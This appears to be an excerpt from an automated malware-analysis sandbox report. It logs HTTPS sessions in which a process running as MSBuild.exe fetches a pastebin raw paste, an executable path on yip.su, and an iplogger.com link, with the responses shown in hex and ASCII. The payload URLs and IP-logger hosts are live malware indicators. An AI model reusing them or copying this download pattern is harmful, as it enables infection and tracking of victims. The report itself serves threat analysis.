                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:21:57 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:21:57 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:57 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.649756104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:02 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:02 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4339175f7c1831-EWR
                    2024-09-16 19:22:02 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:02 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:02 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:02 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:02 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.649757188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:03 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:03 UTC910INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:03 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:03 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NuIh4Eaks7wGd%2F8%2Bk7ldFmIVCG%2BITveEsUEvRxe%2B1tcK0T5zzuCwxRMwX0Kkwk8l4U0rqhecq1J4bIi7yWShbVw%2BkZhSrBBdVggAa9aTa3Q%2F%2FH%2F7uprr3Lc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c43391c7983424f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:03 UTC459INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:03 UTC1369INData Raw: 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65
                    Data Ascii: revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><me
                    2024-09-16 19:22:03 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74
                    Data Ascii: ackground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animat
                    2024-09-16 19:22:03 UTC1369INData Raw: 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64
                    Data Ascii: igator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.ind
                    2024-09-16 19:22:03 UTC1369INData Raw: 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75
                    Data Ascii: script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:au
                    2024-09-16 19:22:03 UTC1369INData Raw: 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09
                    Data Ascii: eight:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
                    2024-09-16 19:22:03 UTC166INData Raw: 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: m()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:03 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.649758104.21.76.574431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:08 UTC68OUTGET /1djqU4 HTTP/1.1
                    Host: iplogger.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:08 UTC1285INHTTP/1.1 403 Forbidden
                    Date: Mon, 16 Sep 2024 19:22:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Cross-Origin-Embedder-Policy: require-corp
                    Cross-Origin-Opener-Policy: same-origin
                    Cross-Origin-Resource-Policy: same-origin
                    Origin-Agent-Cluster: ?1
                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                    Referrer-Policy: same-origin
                    X-Content-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    cf-mitigated: challenge
                    2024-09-16 19:22:08 UTC691INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4e 72 66 6c 6d 44 6e 41 61 68 34 47 6c 49 75 4c 4b 73 2f 4f 6b 66 56 6d 6f 51 6e 74 58 66 31 4d 65 7a 46 75 4a 73 4f 31 4a 69 76 50 31 62 6a 59 35 49 59 36 4d 54 46 77 51 34 38 38 48 51 58 6a 6f 42 62 64 51 74 44 70 52 45 6e 45 4b 33 74 50 42 4b 43 6d 2f 30 79 5a 62 70 4d 67 4e 64 7a 75 6d 6b 48 53 6c 6e 71 55 72 6e 34 3d 24 5a 51 42 54 75 58 4e 79 48 54 58 37 4a 4c 37 36 5a 75 65 62 56 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                    Data Ascii: cf-chl-out: NrflmDnAah4GlIuLKs/OkfVmoQntXf1MezFuJsO1JivP1bjY5IY6MTFwQ488HQXjoBbdQtDpREnEK3tPBKCm/0yZbpMgNdzumkHSlnqUrn4=$ZQBTuXNyHTX7JL76ZuebVA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                    2024-09-16 19:22:08 UTC1369INData Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                    Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                    2024-09-16 19:22:08 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                    Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                    2024-09-16 19:22:08 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                    Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
